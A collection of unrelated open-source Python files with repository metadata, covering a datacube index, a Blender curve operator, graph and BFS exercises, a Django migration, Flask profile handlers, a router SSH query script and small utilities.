py
|
from pathlib import Path
ROOT_DIR = Path(__file__).parent.parent
if __name__ == "__main__":
print(ROOT_DIR)
|
[
"kindroach@hotmail.com"
] |
kindroach@hotmail.com
|
7e33879f634aa7e8d75988cebf28a1a0a95922cf
|
9918208c80a3c396d8a1e13783d501d60dbc2050
|
/digitalearthau/index.py
|
184f71b63443c944423a74ab43f21a32af6c40c5
|
[] |
no_license
|
benjimin/digitalearthau
|
2d3010be76fad0d0b6b4854dbbad07e98254b239
|
5098bf3c88627cad78a8caa5ab703c586c17a6f7
|
refs/heads/develop
| 2022-02-27T07:36:16.009689
| 2017-09-14T05:51:27
| 2017-09-14T05:51:27
| 103,460,937
| 0
| 0
| null | 2017-09-13T23:10:15
| 2017-09-13T23:10:15
| null |
UTF-8
|
Python
| false
| false
| 7,353
|
py
|
import collections
import uuid
from datetime import datetime
from typing import Iterable, Optional, Mapping, List
from datacube.index import index_connect
from datacube.index._api import Index
from datacube.model import Dataset
from datacube.scripts import dataset as dataset_script
from datacube.utils import uri_to_local_path
from digitalearthau.utils import simple_object_repr
class DatasetLite:
"""
A small subset of datacube.model.Dataset.
A "real" dataset needs a lot of initialisation: types etc, so this is easier to test with.
We also, in this script, depend heavily on the __eq__ behaviour of this particular class (by id only), and subtle
bugs could occur if the core framework made changes to it.
"""
def __init__(self, id_: uuid.UUID, archived_time: datetime = None) -> None:
# Sanity check of the type, as our equality checks are quietly wrong if the types don't match,
# and we've previously had problems with libraries accidentally switching string/uuid types...
assert isinstance(id_, uuid.UUID)
self.id = id_
self.archived_time = archived_time
@property
def is_archived(self):
"""
Is this dataset archived?
(an archived dataset is one that is not intended to be used by users anymore: eg. it has been
replaced by another dataset. It will not show up in search results, but still exists in the
system via provenance chains or through id lookup.)
:rtype: bool
"""
return self.archived_time is not None
def __eq__(self, other):
if not other:
return False
return self.id == other.id
def __hash__(self):
return hash(self.id)
@classmethod
def from_agdc(cls, dataset: Dataset):
return DatasetLite(dataset.id, archived_time=dataset.archived_time)
def __repr__(self):
return simple_object_repr(self)
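# Illustrative only (not part of the original module): because __eq__ above
# compares ids alone, two DatasetLite objects with the same id are equal even
# when their other fields differ.
#   some_id = uuid.uuid4()
#   DatasetLite(some_id) == DatasetLite(some_id, archived_time=datetime.now())  # True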
class DatasetPathIndex:
"""
An index of datasets and their URIs.
This is a slightly questionable attempt to make testing/mocking simpler.
There's two implementations: One in-memory and one that uses a real datacube.
(MemoryDatasetPathIndex and AgdcDatasetPathIndex)
"""
def iter_all_uris(self, query: dict) -> Iterable[str]:
raise NotImplementedError
def get_datasets_for_uri(self, uri: str) -> Iterable[DatasetLite]:
raise NotImplementedError
def get(self, dataset_id: uuid.UUID) -> Optional[DatasetLite]:
raise NotImplementedError
def add_location(self, dataset: DatasetLite, uri: str) -> bool:
raise NotImplementedError
def remove_location(self, dataset: DatasetLite, uri: str) -> bool:
raise NotImplementedError
def add_dataset(self, dataset: DatasetLite, uri: str):
raise NotImplementedError
def as_map(self) -> Mapping[DatasetLite, Iterable[str]]:
"""Map of all datasets to their uri list. Convenience method for tests"""
raise NotImplementedError
def close(self):
"""Do any clean-up as needed before forking."""
# Default implementation: no-op
pass
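# Illustrative only: callers can be written against the DatasetPathIndex
# interface and exercised with the in-memory implementation defined below.
#   index = MemoryDatasetPathIndex()
#   index.add_dataset(DatasetLite(uuid.uuid4()), 'file:///tmp/dataset.yaml')
#   list(index.iter_all_uris({}))  # -> ['file:///tmp/dataset.yaml']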
class AgdcDatasetPathIndex(DatasetPathIndex):
def __init__(self, index: Index) -> None:
super().__init__()
self._index = index
self._rules = dataset_script.load_rules_from_types(self._index)
def iter_all_uris(self, query: dict) -> Iterable[str]:
for uri, in self._index.datasets.search_returning(['uri'], **query):
yield str(uri)
@classmethod
def connect(cls) -> 'AgdcDatasetPathIndex':
return cls(index_connect(application_name='digitalearthau-pathsync'))
def get_datasets_for_uri(self, uri: str) -> Iterable[DatasetLite]:
for d in self._index.datasets.get_datasets_for_location(uri=uri):
yield DatasetLite.from_agdc(d)
def remove_location(self, dataset: DatasetLite, uri: str) -> bool:
was_removed = self._index.datasets.remove_location(dataset.id, uri)
return was_removed
def get(self, dataset_id: uuid.UUID) -> Optional[DatasetLite]:
agdc_dataset = self._index.datasets.get(dataset_id)
return DatasetLite.from_agdc(agdc_dataset) if agdc_dataset else None
    def add_location(self, dataset: DatasetLite, uri: str) -> bool:
        was_added = self._index.datasets.add_location(dataset.id, uri)
        return was_added
def add_dataset(self, dataset: DatasetLite, uri: str):
path = uri_to_local_path(uri)
for d in dataset_script.load_datasets([path], self._rules):
if d.id == dataset.id:
self._index.datasets.add(d, sources_policy='ensure')
break
else:
raise RuntimeError('Dataset not found at path: %s, %s' % (dataset.id, uri))
def close(self):
self._index.close()
def as_map(self) -> Mapping[DatasetLite, Iterable[str]]:
"""
All contained (dataset, [location]) values, to check test results.
"""
return dict(
(
DatasetLite(dataset.id),
tuple(dataset.uris)
)
for dataset in self._index.datasets.search()
)
def __enter__(self):
return self
def __exit__(self, type_, value, traceback):
self.close()
class MemoryDatasetPathIndex(DatasetPathIndex):
"""
An in-memory implementation, so that we can test without using a real datacube index.
"""
def get(self, dataset_id: uuid.UUID) -> Optional[DatasetLite]:
for d in self._records.keys():
if d.id == dataset_id:
return d
return None
def __init__(self):
super().__init__()
# Map of dataset to locations.
self._records = collections.defaultdict(list) # type: Mapping[DatasetLite, List[str]]
def reset(self):
self._records = collections.defaultdict(list)
def iter_all_uris(self, query: dict) -> Iterable[str]:
for uris in self._records.values():
yield from uris
def add_location(self, dataset: DatasetLite, uri: str) -> bool:
if dataset not in self._records:
raise ValueError("Unknown dataset {} -> {}".format(dataset.id, uri))
return self._add(dataset, uri)
    def _add(self, dataset, uri):
        if uri in self._records[dataset]:
            # Not added
            return False
        self._records[dataset].append(uri)
        return True
def remove_location(self, dataset: DatasetLite, uri: str) -> bool:
if uri not in self._records[dataset]:
# Not removed
return False
# We never remove the dataset key, only the uris.
self._records[dataset].remove(uri)
return True
def get_datasets_for_uri(self, uri: str) -> Iterable[DatasetLite]:
for dataset, uris in self._records.items():
if uri in uris:
yield dataset
def as_map(self) -> Mapping[DatasetLite, Iterable[str]]:
"""
All contained (dataset, [location]) values, to check test results.
"""
return {id_: tuple(uris) for id_, uris in self._records.items()}
def add_dataset(self, dataset: DatasetLite, uri: str):
# We're not actually storing datasets...
return self._add(dataset, uri)
|
[
"jez@stulk.com"
] |
jez@stulk.com
|
86e497f7d8b7f8e601d5bdf3d3d634b51fbc04bf
|
e82b761f53d6a3ae023ee65a219eea38e66946a0
|
/All_In_One/addons/hair_tool/curves_resample.py
|
bbf794543f831be09e4c96a6a4ed9485f74a8093
|
[] |
no_license
|
2434325680/Learnbgame
|
f3a050c28df588cbb3b14e1067a58221252e2e40
|
7b796d30dfd22b7706a93e4419ed913d18d29a44
|
refs/heads/master
| 2023-08-22T23:59:55.711050
| 2021-10-17T07:26:07
| 2021-10-17T07:26:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,061
|
py
|
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Copyright (C) 2017 JOSECONSCO
# Created by JOSECONSCO
import bpy
import math
import numpy as np
from bpy.props import EnumProperty, FloatProperty, BoolProperty, IntProperty, StringProperty
from .resample2d import interpol_Catmull_Rom, get_strand_proportions
class HT_OT_CurvesResample(bpy.types.Operator):
bl_label = "Curve resample"
bl_idname = "object.curve_resample"
    bl_description = "Change amount of points on curve"
bl_options = {"REGISTER", "UNDO"}
hairType: bpy.props.EnumProperty(name="Output Curve Type", default="NURBS",
items=(("BEZIER", "Bezier", ""),
("NURBS", "Nurbs", ""),
("POLY", "Poly", "")))
# bezierRes: IntProperty(name="Bezier resolution", default=3, min=1, max=12)
t_in_y: IntProperty(name="Strand Segments", default=8, min=3, max=20)
    uniformPointSpacing: BoolProperty(name="Uniform spacing", description="Distribute strand points with uniform spacing", default=False)
    equalPointCount: BoolProperty(name="Equal point count", description="Give all curves same point count \n"
                                  "If disabled shorter curves will have less points", default=False)
onlySelection: BoolProperty(name="Only Selected", description="Affect only selected points", default=False)
def invoke(self, context, event):
particleObj = context.active_object
if particleObj.mode == 'EDIT':
self.onlySelection = True
elif particleObj.mode == 'OBJECT':
self.onlySelection = False
Curve = context.active_object
if not Curve.type == 'CURVE':
self.report({'INFO'}, 'Use operator on curve type object')
return {"CANCELLED"}
self.input_spline_type = Curve.data.splines[0].type
self.hairType = self.input_spline_type # hair type - output spline
if self.input_spline_type == 'NURBS':
self.nurbs_order = Curve.data.splines[0].order_u
        if len(Curve.data.splines) > 0:  # get initial value for resampling t
polyline = Curve.data.splines[0] # take first spline len for resampling
if polyline.type == 'NURBS' or polyline.type == 'POLY':
self.t_in_y = len(polyline.points)
else:
self.t_in_y = len(polyline.bezier_points)
self.bezierRes = Curve.data.resolution_u
return self.execute(context)
def execute(self, context):
curveObj = context.active_object
if curveObj.type != 'CURVE':
self.report({'INFO'}, 'Works only on curves')
return {"CANCELLED"}
pointsList = []
pointsRadius = []
pointsTilt = []
selectedSplines = []
if self.onlySelection:
for polyline in curveObj.data.splines:
if polyline.type == 'NURBS' or polyline.type == 'POLY':
if any(point.select == True for point in polyline.points):
selectedSplines.append(polyline)
else:
if any(point.select_control_point == True for point in polyline.bezier_points):
selectedSplines.append(polyline)
if not selectedSplines:
selectedSplines = curveObj.data.splines
else:
selectedSplines = curveObj.data.splines
for polyline in selectedSplines: # for strand point
if polyline.type == 'NURBS' or polyline.type == 'POLY':
points = polyline.points
else:
points = polyline.bezier_points
if len(points) > 1: # skip single points
pointsList.append([point.co.to_3d() for point in points])
pointsRadius.append([point.radius for point in points])
pointsTilt.append([point.tilt for point in points])
backup_mat_indices = [spline.material_index for spline in selectedSplines]
interpolRad = []
interpolTilt = []
splinePointsList = interpol_Catmull_Rom(pointsList, self.t_in_y, uniform_spacing = self.uniformPointSpacing, same_point_count=self.equalPointCount)
if self.equalPointCount: # each output spline will have same point count
t_ins_y = [i / (self.t_in_y - 1) for i in range(self.t_in_y)]
for radii, tilts in zip(pointsRadius, pointsTilt): # per strand
t_rad = [i / (len(radii) - 1) for i in range(len(radii))]
interpolRad.append(np.interp(t_ins_y, t_rad, radii)) # first arg len() = out len
interpolTilt.append(np.interp(t_ins_y, t_rad, tilts)) # first arg len() = out len
else: # shorter output splines will have less points
lens = [len(x) for x in splinePointsList]
for radii, tilts, strandLen in zip(pointsRadius, pointsTilt, lens): # per strand
t_ins_Normalized = [i / (strandLen - 1) for i in range(strandLen)]
t_rad = [[i / (len(radii) - 1) for i in range(len(radii))]]
interpolRad.append(np.interp(t_ins_Normalized, t_rad[0], radii)) # first arg len() = out len
interpolTilt.append(np.interp(t_ins_Normalized, t_rad[0], tilts)) # first arg len() = out len
curveData = curveObj.data
# spline_type =
if self.onlySelection:
for spline in selectedSplines:
curveData.splines.remove(spline)
else:
curveData.splines.clear()
newSplines = []
for k, splinePoints in enumerate(splinePointsList): # for each strand/ring
            curveLength = len(splinePoints)
            polyline = curveData.splines.new(self.hairType)
            newSplines.append(polyline)
            if self.hairType == 'BEZIER':
                polyline.bezier_points.add(curveLength - 1)
            elif self.hairType == 'POLY' or self.hairType == 'NURBS':
                polyline.points.add(curveLength - 1)
if self.hairType == 'NURBS':
polyline.order_u = self.nurbs_order if self.input_spline_type == 'NURBS' else 3
polyline.use_endpoint_u = True
np_splinePointsOnes = np.ones((len(splinePoints), 4)) # 4 coord x,y,z ,1
np_splinePointsOnes[:, :3] = splinePoints
if self.hairType == 'BEZIER':
polyline.bezier_points.foreach_set('co', np_splinePointsOnes[:, :3])
polyline.bezier_points.foreach_set('radius', interpolRad[k])
polyline.bezier_points.foreach_set('tilt', interpolTilt[k])
polyline.bezier_points.foreach_set('handle_left_type', 'AUTO')
polyline.bezier_points.foreach_set('handle_right_type', 'AUTO')
else:
polyline.points.foreach_set('co', np_splinePointsOnes.ravel())
polyline.points.foreach_set('radius', interpolRad[k])
polyline.points.foreach_set('tilt', interpolTilt[k])
curveData.resolution_u = self.bezierRes
# bpy.ops.object.curve_uv_refresh()
for backup_mat, newSpline in zip(backup_mat_indices, newSplines):
newSpline.material_index = backup_mat
return {"FINISHED"}
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
712c8911fb30a81f68341c8d02607fc01373169c
|
bc2effb57e82128b81371fb03547689255d5ef15
|
/백준/그래프/13549(숨바꼭질 3).py
|
3e27f94ac43b4efa403bf096775a59d3e8e538cd
|
[] |
no_license
|
CharmingCheol/python-algorithm
|
393fa3a8921f76d25e0d3f02402eae529cc283ad
|
61c8cddb72ab3b1fba84171e03f3a36f8c672648
|
refs/heads/master
| 2023-03-01T11:00:52.801945
| 2021-01-31T13:38:29
| 2021-01-31T13:38:29
| 229,561,513
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 738
|
py
|
import sys
from collections import deque
MAX_SIZE = 100001
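# BOJ 13549 ("hide and seek 3"): from position `now`, the moves now-1 and now+1
# cost 1 second while the teleport to now*2 is free. The loop below is a
# relaxation-style search: board[p] keeps the cheapest cost found so far for
# position p, and stale queue entries (whose cost no longer matches the board)
# are skipped.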
start, end = map(int, sys.stdin.readline().split())
board = [float("inf")] * MAX_SIZE
board[start] = 0
queue = deque()
queue.append((start, 0))
while queue:
now, value = queue.popleft()
if now == end:
print(board[now])
break
if value != board[now]: continue
if 0 <= now - 1 and value + 1 < board[now - 1]:
board[now - 1] = value + 1
queue.append((now - 1, value + 1))
if now + 1 < MAX_SIZE and value + 1 < board[now + 1]:
board[now + 1] = value + 1
queue.append((now + 1, value + 1))
if now * 2 < MAX_SIZE and value < board[now * 2]:
board[now * 2] = value
queue.append((now * 2, value))
|
[
"54410332+chamincheol@users.noreply.github.com"
] |
54410332+chamincheol@users.noreply.github.com
|
b64dcfd8310e0a91a5674a0426a212d4e4014f18
|
b12875980121be80628e3204a5a62fbbd6190222
|
/seesion7/minihack5.py
|
7dba52421d756d3b660a75259e7d867a584fab55
|
[] |
no_license
|
hoangstillalive/hoangstillalive
|
ef2eb9a173b346e75ac0a35c455cebacd1a9fe91
|
304e0087792857815090cb890e18086d1128df6f
|
refs/heads/master
| 2020-06-12T10:07:33.319139
| 2019-09-13T12:31:57
| 2019-09-13T12:31:57
| 194,267,120
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 192
|
py
|
side = int(input("Enter side of shape you like:"))
angle = 360/side
from turtle import*
shape("turtle")
for i in range(side):
forward(100)
left (angle)
mainloop()
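# After each side the turtle turns by the polygon's exterior angle
# (360/side degrees), so the path closes into a regular polygon.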
|
[
"minhhoangtruong.a1@gmail.com"
] |
minhhoangtruong.a1@gmail.com
|
c0b608d437f149d8760c931ec9488e38f0fefb57
|
b7634e92ed147a34cdb017598c6d8dd41c0def96
|
/aula05/migrations/0002_categoria_comentario_post.py
|
3a636face480cf6e0fdc9a2f6b875eb3ce1d9fd2
|
[] |
no_license
|
mayronceccon/olist-django-labs
|
a4e9805489f4c9ad782f5085188dee342d4ac051
|
fbe6f314554e65f0a47dddc7c2c21165ccc1d828
|
refs/heads/master
| 2021-09-28T14:21:44.385979
| 2020-06-06T00:25:54
| 2020-06-06T00:25:54
| 240,728,135
| 1
| 0
| null | 2021-09-22T18:44:59
| 2020-02-15T14:36:27
|
Python
|
UTF-8
|
Python
| false
| false
| 1,411
|
py
|
# Generated by Django 3.0.3 on 2020-02-29 17:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('aula05', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Categoria',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nome', models.CharField(max_length=30)),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('titulo', models.CharField(max_length=254)),
('texto', models.TextField()),
('categorias', models.ManyToManyField(related_name='posts', to='aula05.Categoria')),
],
),
migrations.CreateModel(
name='Comentario',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('autor', models.CharField(max_length=30)),
('comentario', models.TextField()),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='aula05.Post')),
],
),
]
|
[
"mayron.ceccon@gmail.com"
] |
mayron.ceccon@gmail.com
|
b04ee7d509224ea32bcdc2abd3aa726509802b36
|
253296050582fbe0a8605353295ab27daae4deff
|
/main.py
|
32884c43658bae739d1868be5e5ce5b322bef693
|
[] |
no_license
|
qiita-scraper/qiita-scraper-rocket-chat
|
a44d95d125431670dda97b5614f92d0ee0d09098
|
86c1b6e0d4d889deb9a468cd85a1d0f93eb9cc20
|
refs/heads/master
| 2023-05-14T23:39:42.637110
| 2019-12-17T15:50:51
| 2019-12-17T15:50:51
| 228,154,303
| 4
| 0
| null | 2023-05-07T13:10:45
| 2019-12-15T08:43:31
|
Python
|
UTF-8
|
Python
| false
| false
| 1,461
|
py
|
import os
from rocket_chat import rocket_chat
from qiita import qiita
import yaml
def main():
url, user, password = __get_os_environ()
room_name, organization = __get_config()
q = qiita.Qiita()
rc = rocket_chat.RocketChat(url, user, password)
for user in q.fetch_organization_users(organization):
articles = q.fetch_recent_user_articles(user)
for yesterday_article in q.extract_yesterday_articles(articles):
msg = rc.format_message(user=user, title=yesterday_article['title'], article_url=yesterday_article['url'])
rc.send_message_to_rocket_chat(msg, room_name)
def __get_config():
    with open("config.yml", "r") as f:
        data = yaml.safe_load(f)
    room_name = data.get('rocket_chat').get('room_name')
    organization = data.get('qiita').get('organization')
    return room_name, organization
def __get_os_environ():
url = os.environ.get('ROCKET_CHAT_URL')
user = os.environ.get('ROCKET_CHAT_USER')
password = os.environ.get('ROCKET_CHAT_PASSWORD')
if url is None or len(url) == 0:
raise Exception('ROCKET_CHAT_URL is not set in environment variable')
if user is None or len(user) == 0:
raise Exception('ROCKET_CHAT_USER is not set in environment variable')
if password is None or len(password) == 0:
raise Exception('ROCKET_CHAT_PASSWORD is not set in environment variable')
return url, user, password
def handler(event, context):
main()
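# Example invocation (values are illustrative only):
#   ROCKET_CHAT_URL=https://chat.example.com \
#   ROCKET_CHAT_USER=bot ROCKET_CHAT_PASSWORD=secret \
#   python main.py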
|
[
"daisuke.awaji@i.softbank.jp"
] |
daisuke.awaji@i.softbank.jp
|
bc54e1b48cf35f7afe4085bcfc57748031ff30b5
|
8ac0beeda7da3f6059f47dbd71f90a375589b8eb
|
/Ubiquiti/EdgeRouter-Lite.py
|
5c1e1a6a434fbfc723d8a192f78062264691d878
|
[] |
no_license
|
evgenyzorin/Paramiko
|
f98dbabdb0954c4e55ecd88604de6ba81d421e6c
|
9deb3d6d0491717524117dfd2c1a9cb4c968d016
|
refs/heads/main
| 2023-09-02T16:43:13.279258
| 2021-11-11T08:34:49
| 2021-11-11T08:34:49
| 390,994,305
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,628
|
py
|
from paramiko import SSHClient, AutoAddPolicy
from datetime import datetime
import re
start_time = datetime.now()
def send_show_command(
devices,
username,
password,
command,
max_bytes=60000,
delay=1,
):
client = SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(AutoAddPolicy())
info = {}
for device in devices:
print(f'\n---------- Connecting device {device} ----------\n')
client.connect(
hostname=device,
username=username,
password=password,
look_for_keys=False,
allow_agent=False,
)
        stdin, stdout, stderr = client.exec_command(command)
output = stdout.readlines()
for line in output[3:]:
data = [i.strip() for i in line.split(' ') if i]
if re.search('[a-zA-Z]', data[0]):
interface = data[0]
info[interface] = {
'ip': [data[1]],
'state': data[2].split('/')[0],
'link': data[2].split('/')[1],
'description': data[3],
}
else:
info[interface]['ip'].append(data[0])
print(info)
if __name__ == '__main__':
devices = ['192.168.1.1', '192.168.1.2']
command = '/opt/vyatta/bin/vyatta-op-cmd-wrapper show interfaces'
send_show_command(devices, 'ubnt', 'ubnt', command)
run_time = datetime.now() - start_time
print(f'\n---------- Elapsed time: {run_time} ----------\n')
|
[
"noreply@github.com"
] |
evgenyzorin.noreply@github.com
|
7eaa3fc42b530ce553df3f478e57dfcb78907226
|
335efc133db52ce3dcbb114f6be1e2e5c308ab35
|
/backend/myprofile.py
|
677b25332bc919433660284ec8608f4900feeaf6
|
[] |
no_license
|
mrclauderandall/CS-Capstone-Project
|
12c9987713bf398fee838b6a1025fafbf3a8885d
|
cc599ac7d836360bfb78c80e4bbfb893bca39c2f
|
refs/heads/master
| 2023-06-29T13:16:56.207602
| 2021-08-09T02:51:34
| 2021-08-09T02:51:34
| 394,126,058
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,353
|
py
|
import psycopg2
from flask import jsonify
#
# Should we migrate these functions to user.py?
#
def myprofile(username, conn):
    cur = conn.cursor()
    # Parameterized queries let psycopg2 escape user-supplied values,
    # avoiding the SQL injection possible with string interpolation.
    cur.execute(
        "SELECT * FROM public.users WHERE email = %s", (username,)
    )
    result = cur.fetchall()
    conn.close()
    return(jsonify(result))
def editprofile(email, first_name, last_name, password, username, conn):
    cur = conn.cursor()
    cur.execute(
        "UPDATE public.users SET first_name = %s, last_name = %s, password = %s, email = %s WHERE email = %s",
        (first_name, last_name, password, email, username)
    )
    conn.commit()
    conn.close()
    return(jsonify(200))
def setDP(image_url, username, conn):
    cur = conn.cursor()
    cur.execute(
        "UPDATE public.users SET profile_pic = %s WHERE email = %s", (image_url, username)
    )
    conn.commit()
    conn.close()
    return(jsonify(200))
def getDP(username, conn):
    cur = conn.cursor()
    cur.execute(
        "SELECT profile_pic FROM public.users WHERE email = %s", (username,)
    )
    result = cur.fetchone()
    conn.commit()
    conn.close()
    return (jsonify(result[0]))
def removeDP(username, conn):
    cur = conn.cursor()
    cur.execute(
        "UPDATE public.users SET profile_pic = NULL WHERE email = %s", (username,)
    )
    conn.commit()
    conn.close()
    return(jsonify(200))
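# Minimal usage sketch (DSN values are hypothetical). Note that every function
# above closes the connection it is given, so each call needs a fresh one.
#   conn = psycopg2.connect("dbname=app user=app password=secret host=localhost")
#   response = myprofile("alice@example.com", conn)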
|
[
"mrclauderandall@gmail.com"
] |
mrclauderandall@gmail.com
|
a2f7ae216b410776277bf51f39352e0afd7a8354
|
cb892c75961eeae4e9c968403e823565d2b0056e
|
/periodic1D.py
|
ce67dcd6b4588f63f65e9a66e3aeef14fbdecd90
|
[] |
no_license
|
victorstorchan/signal-processing
|
7deb60ed1e3f7ae09553cbe0faf6fce3fec97fc8
|
a51e9855cb8cb7a63ecbab9fac645fc4846b03a7
|
refs/heads/master
| 2021-01-19T03:02:07.791676
| 2016-07-16T12:32:27
| 2016-07-16T12:32:27
| 52,238,889
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,917
|
py
|
import numpy as np
import matplotlib.pyplot as plt
from cmath import polar
from math import sqrt
#definition of the boxcars signals
def boxcar(x,i):
if x-i<-1 or x-i>1:
return 0
else:
return 1
x= np.arange(-2.,2.,0.05)
n=len(x)
print(n)
True_signal=np.zeros(n)
for i in range(n):
True_signal[i]=boxcar(x[i],0)
#plt.plot(x,True_signal)
#plt.axis([-2,2,-1,2])
#plt.show()
#definitions of the shifted signals
y=np.zeros(n,dtype=complex)
y2=np.zeros(n,dtype=complex)
base=np.zeros(n,dtype=complex)
vector_of_shift=[0,3,10,30]#shifts are integer in discrete version
len_shift=len(vector_of_shift)
#signal with shift:
shifted_signals=np.zeros((len_shift,n),dtype=complex)
shifted_signals_1=np.zeros((len_shift,n),dtype=complex)
for k in range(n):
base[k]=boxcar(x[k],0)
max_shift=max(vector_of_shift)
base_period=np.lib.pad(base, (max_shift, 0), 'wrap')
for s in range(len_shift):
for k in range(n):
if k-vector_of_shift[s]<0:
y[k]=base_period[max_shift-vector_of_shift[s]-1+k]
y2[k]=base_period[max_shift-vector_of_shift[s]-1+k]*np.exp(2J*np.pi*k/n)
else:
y[k]=boxcar(x[k-vector_of_shift[s]],0)
y2[k]=boxcar(x[k-vector_of_shift[s]],0)*np.exp(2J*np.pi*k/n)
randvect=np.random.normal(0,0.1,n)
shifted_signals[s] =y#+ randvect
shifted_signals_1[s]=y2#+ randvect
A=np.fft.fft(shifted_signals)
A_1=np.fft.fft(shifted_signals_1).conjugate()
A_star=np.zeros((len_shift,n),dtype=complex)
for i in range(len_shift):
A_star[i] = A[i]*A_1[i]
A_star_matrix=np.matrix(A_star)
A_star_transpose=A_star_matrix.getH()
A_prod1=A_star_matrix*A_star_transpose
A_prod=A_prod1/A_prod1[0,0]
(V,sigma,V_star)=np.linalg.svd(A_prod,full_matrices=1)
v1=V_star[0].getH()
#the shifts are recovered:
output=np.zeros(len_shift,dtype=complex)
for i in range(len_shift):
output[i]=-n*polar(-v1[i,0])[1]/(2*np.pi)
print(output)
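# Why the phase encodes the shift (sketch): by the DFT shift theorem, delaying a
# length-n signal by s samples multiplies its k-th Fourier coefficient by
# exp(-2j*pi*k*s/n). The products A[i] * conj(A_1[i]) therefore carry the shifts
# in their phases, which are read back from the leading singular vector v1 above.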
|
[
"noreply@github.com"
] |
victorstorchan.noreply@github.com
|
65e50e3080ce522797d0807c4a9ccf3ad3d59230
|
9cb4b1707c9cf2cb2d45849a32625ddcd5d2ce15
|
/data_structures/graph/graph.py
|
76c5509f826c0cf30c80e238bb6245540194a1f8
|
[] |
no_license
|
paxzeno/CrackingTheCodingInterview
|
14b0a0bd8a8f9a0bf30defbd07c4e6d1c1b0a549
|
d082c704d8a2d4a4e61371091abb023a1dc5fa99
|
refs/heads/master
| 2020-04-26T17:24:55.098714
| 2019-03-16T17:35:03
| 2019-03-16T17:35:03
| 173,712,427
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,397
|
py
|
import random
import Queue
from node import Node
class RoadMap:
def __init__(self, queue):
self._queue = queue
self._path = {}
self._new_paths = set()
def get_queue(self):
return self._queue
def set_path(self, node_name, parent_node_name):
# think if there may be some bogus behavior,
# because of several parents could share the same child node
self._path[node_name] = parent_node_name
def get_path(self):
return self._path
def set_new_paths(self, paths):
self._new_paths = paths
def get_new_paths(self):
return self._new_paths
class Graph:
def __init__(self):
self._nodes = []
def add_node(self, node):
self._nodes.append(node)
def get_nodes(self):
return self._nodes
def generate_graph(self, number_nodes, max_number_children=4):
self._nodes = [None] * number_nodes
for i in xrange(0, number_nodes):
self._nodes[i] = Node(i)
for node in self._nodes:
# number of children this node will have from 1 to 4 Max
number_children = random.randint(1, max_number_children)
for j in xrange(0, number_children):
child_node_name = -1
while child_node_name == -1 or child_node_name == node.get_name():
child_node_name = random.randint(0, number_nodes - 1)
node.add_child(self._nodes[child_node_name])
def depth_first_search(self, node_name):
# to be implemented
return None
    def breadth_first_search(self, root_name, end_name):
node = self._nodes[root_name]
queue = Queue.Queue()
queue.put(node)
# TODO no need to have checked and path,
# TODO path can handle both functions
checked = set()
        checked.add(node.get_name())
path = {}
while not queue.empty():
q_node = queue.get()
self.print_node(q_node)
for child_node in q_node.get_children():
if child_node.get_name() not in checked:
path[child_node.get_name()] = q_node.get_name()
checked.add(child_node.get_name())
if child_node.get_name() == end_name:
return self.print_path(path, root_name, end_name)
else:
queue.put(child_node)
return self.print_path(None)
def bidirectional_bfs_search(self, root_name, end_name):
root_node = self._nodes[root_name]
end_node = self._nodes[end_name]
root_queue = Queue.Queue()
root_queue.put(root_node)
root_road_map = RoadMap(root_queue)
found = False
while not root_road_map.get_queue().empty() and not found:
root_road_map = self.iterated_bfs_search(root_road_map)
if end_node in root_road_map.get_new_paths():
found = True
if found:
return self.print_path(root_road_map.get_path(), root_name, end_name)
return self.print_path(None)
def iterated_bfs_search(self, road_map):
queue = road_map.get_queue()
node = queue.get()
self.print_node(node)
children = node.get_children()
road_map.set_new_paths(children)
path = road_map.get_path()
for child_node in children:
if child_node.get_name() not in path:
road_map.set_path(child_node.get_name(), node.get_name())
queue.put(child_node)
return road_map
@staticmethod
def print_path(path, origin=None, end=None):
if path is None:
return 'No path found for the node'
route = str(end)
pointer = end
while pointer != origin:
route += ' -> ' + str(path[pointer])
pointer = path[pointer]
return route
@staticmethod
def print_node(node):
print_children = ', Child Nodes: ['
for child_node in node.get_children():
print_children += str(child_node.get_name()) + ';'
print_children += ']'
print('Node:' + str(node.get_name()) + print_children)
if __name__ == '__main__':
graph = Graph()
graph.generate_graph(20, 2)
    print(graph.breadth_first_search(0, 2))
print(graph.bidirectional_bfs_search(0, 2))
|
[
"paxzeno@gmail.com"
] |
paxzeno@gmail.com
|
15660f72a517e3b32ec05f1edde94a333241df3b
|
1a41addd7ca9486b5392158984f0e5c14d92edff
|
/tests.py
|
331c9c2324a88becd6a3d030e51f2608966da740
|
[
"MIT"
] |
permissive
|
humin11/sixquant
|
32e94c2d1035c87a5cad816dd1286613c54174cd
|
bf3614c34cdbd4373dcbfc0cb24f58a1d7957d47
|
refs/heads/master
| 2021-08-26T08:37:33.808255
| 2017-11-22T16:10:36
| 2017-11-22T16:10:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 309
|
py
|
# coding=utf-8
import os
import sys
import unittest
root = os.path.abspath(os.path.expanduser(__file__ + '/../tests'))
sys.path.append(root)
if __name__ == '__main__':
suite = unittest.TestSuite()
suite.addTest(unittest.defaultTestLoader.discover('tests'))
